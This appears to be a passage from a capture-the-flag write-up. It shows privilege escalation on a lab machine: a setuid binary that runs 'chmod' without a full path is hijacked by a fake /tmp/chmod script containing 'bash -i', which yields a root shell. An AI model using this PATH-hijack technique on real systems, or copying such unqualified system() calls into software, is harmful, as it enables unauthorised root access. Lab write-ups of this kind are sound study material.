6 privesc

dexter@laboratory:/tmp$ strings /usr/local/bin/docker-security
Command 'strings' not found, but can be installed with:
Please ask your administrator.

dexter@laboratory:/tmp$ ltrace /usr/local/bin/docker-security
setuid(0)                                                                                            = -1
setgid(0)                                                                                            = -1
system("chmod 700 /usr/bin/docker"chmod: changing permissions of '/usr/bin/docker': Operation not permitted
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                               = 256
system("chmod 660 /var/run/docker.sock"chmod: changing permissions of '/var/run/docker.sock': Operation not permitted
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                               = 256
+++ exited (status 0) +++

dexter@laboratory:/tmp$ nano chmod
dexter@laboratory:/tmp$ cat chmod
#!/bin/bash
bash -i

dexter@laboratory:/tmp$ chmod +x chmod
dexter@laboratory:/tmp$ /usr/local/bin/docker-security
root@laboratory:/tmp# whoami;id;
root
uid=0(root) gid=0(root) groups=0(root),1000(dexter)

Last updated